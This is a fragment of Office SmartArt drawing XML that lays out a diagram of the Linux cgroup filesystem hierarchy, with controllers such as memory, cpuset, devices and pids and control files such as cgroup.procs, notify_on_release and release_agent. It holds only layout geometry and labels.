          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="333625"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="333625"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349"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80EF5C8-C7F7-4C72-AAA1-B45DDA12F878}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4944885" y="571075"/>
          <a:ext cx="310349" cy="2001751"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="2001751"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="2001751"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349" y="0"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
          <a:miter lim="800000"/>
        </a:ln>
        <a:effectLst/>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
    </dsp:sp>
    <dsp:sp modelId="{74D3A8DC-49EC-4EDB-A5D5-43968F7770D6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3082791" y="2239202"/>
          <a:ext cx="310349" cy="333625"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="333625"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349" y="3336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92FB69-938A-47E1-912F-E71053CC70E1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3082791" y="1905577"/>
          <a:ext cx="310349" cy="333625"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="333625"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="333625"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="31034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225FF4-6BE1-4947-896B-873009C1FA44}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3082791" y="1238326"/>
          <a:ext cx="310349" cy="1000875"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="1000875"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="1000875"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="31034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33F0E3-B0A4-4C2D-B72B-7F0D4F300642}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3082791" y="571075"/>
          <a:ext cx="310349" cy="1668126"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="1668126"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="1668126"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="31034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FDD689-D5F4-4069-96E7-C9170A7A8C3F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1531045" y="2002561"/>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/sys/fs/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>cgroups</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1531045" y="2002561"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{721D0469-2E74-48C2-96A1-2DB48C6D8AC2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3393140" y="334434"/>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memory</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3393140" y="334434"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{01E10AE4-C94B-447A-90DB-EAF63F2883B8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3393140" y="1001685"/>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t>cpuset</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3393140" y="1001685"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A6F1218D-8375-46FB-99C2-A8DE4A1D279C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3393140" y="1668935"/>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devices</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3393140" y="1668935"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3DAE3B79-4EFC-4A8E-A54D-4DC1D8E82A63}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3393140" y="2336186"/>
          <a:ext cx="1551745" cy="473282"/>
        </a:xfrm>
        <a:prstGeom prst="rect">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t>rdma</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3393140" y="2336186"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CE11F320-220F-4740-98E2-3DA62E35DC23}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5255235" y="334434"/>
          <a:ext cx="1551745" cy="4732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t>child_cgroup</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5255235" y="334434"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{132917EA-D685-4C86-9AA8-83AC8B2FEDCC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7117329" y="809"/>
          <a:ext cx="1551745" cy="4732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t>notify_on_release</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> = 1</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7117329" y="809"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6670B716-0419-41DD-8415-C20950DBA4FA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7117329" y="668059"/>
          <a:ext cx="1551745" cy="4732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t>cgroup.procs</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7117329" y="668059"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2C78C927-D7C8-4926-9855-4674299C51E5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5255235" y="1001685"/>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t>cgroup.clone_children</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5255235" y="1001685"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E8C15873-A926-4FE5-AB40-BDD829C3E48A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5255235" y="1668935"/>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tasks</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5255235" y="1668935"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{41829412-49CC-426E-8108-4B441EEF9E1C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5255235" y="2336186"/>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smtClean="0"/>
            <a:t>cgroup.procs</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5255235" y="2336186"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FEFCB4E6-BE5D-4883-84F7-FF7C58722A2A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5255235" y="3003437"/>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smtClean="0"/>
            <a:t>cgroup.sane_behavior</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5255235" y="3003437"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{26CC1033-BCEA-43AA-B57B-36A9588D59C0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5255235" y="3681081"/>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smtClean="0"/>
            <a:t>notify_on_release</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5255235" y="3681081"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9C43F5C5-FDD3-4C49-BA52-A30759012A20}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5255235" y="4338747"/>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t>release_agent</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5255235" y="4338747"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BE569898-C06B-4265-BDB8-860FF9DBCC02}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3393140" y="3003437"/>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t>pids</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3393140" y="3003437"/>
        <a:ext cx="1551745" cy="473282"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2D6A334D-6275-431E-A2FD-AF076EC0800B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3393140" y="3670687"/>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t>systemd</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3393140" y="3670687"/>
        <a:ext cx="1551745" cy="4732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AC797-A030-4659-BE14-194F33ABD3FD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3082791" y="2239202"/>
          <a:ext cx="310349" cy="1668126"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="1668126"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349" y="16681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10292B-6E1B-401C-B150-ED662D062485}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3082791" y="2239202"/>
          <a:ext cx="310349" cy="1000875"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="1000875"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349" y="10008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01C5EC-6226-4A7A-B74E-297D1DCEA37A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4944885" y="2572827"/>
          <a:ext cx="310349" cy="2001751"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="2001751"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349" y="2001751"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
          <a:miter lim="800000"/>
        </a:ln>
        <a:effectLst/>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
    </dsp:sp>
    <dsp:sp modelId="{CB25A038-CE0D-4D43-8348-EDF1AF2A25DB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4944885" y="2572827"/>
          <a:ext cx="310349" cy="1334501"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="1334501"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349" y="1334501"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
          <a:miter lim="800000"/>
        </a:ln>
        <a:effectLst/>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
    </dsp:sp>
    <dsp:sp modelId="{1B254077-7700-4884-BB50-56F29058CC59}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4944885" y="2572827"/>
          <a:ext cx="310349" cy="667250"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="667250"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349" y="667250"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
          <a:miter lim="800000"/>
        </a:ln>
        <a:effectLst/>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
    </dsp:sp>
    <dsp:sp modelId="{9816B1EC-E83E-4561-B663-A537448E26A2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4944885" y="2527107"/>
          <a:ext cx="310349" cy="91440"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="45720"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="310349" y="45720"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
          <a:miter lim="800000"/>
        </a:ln>
        <a:effectLst/>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
    </dsp:sp>
    <dsp:sp modelId="{BC5E2220-DD32-4CE1-A7E7-570EDF1B65CA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4944885" y="1905577"/>
          <a:ext cx="310349" cy="667250"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="667250"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="667250"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349" y="0"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
          <a:miter lim="800000"/>
        </a:ln>
        <a:effectLst/>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
    </dsp:sp>
    <dsp:sp modelId="{702981F1-F4B1-44F0-B945-1A0BEFEDD3C2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4944885" y="1238326"/>
          <a:ext cx="310349" cy="1334501"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="1334501"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="1334501"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349" y="0"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
          <a:miter lim="800000"/>
        </a:ln>
        <a:effectLst/>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
    </dsp:sp>
    <dsp:sp modelId="{BEBE32FF-E96A-443B-94E1-5C446D1A7C28}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6806980" y="571075"/>
          <a:ext cx="310349" cy="333625"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="333625"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349" y="3336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3316B4-59D3-4475-BB44-2808BE29157B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6806980" y="237450"/>
          <a:ext cx="310349" cy="333625"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="333625"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="333625"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349"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0EF5C8-C7F7-4C72-AAA1-B45DDA12F878}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4944885" y="571075"/>
          <a:ext cx="310349" cy="2001751"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="2001751"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="155174" y="2001751"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="155174" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="310349" y="0"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
          <a:miter lim="800000"/>
        </a:ln>
        <a:effectLst/>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
    </dsp:sp>
    <dsp:sp modelId="{74D3A8DC-49EC-4EDB-A5D5-43968F7770D6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3082791" y="2239202"/>
          <a:ext cx="310349" cy="333625"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
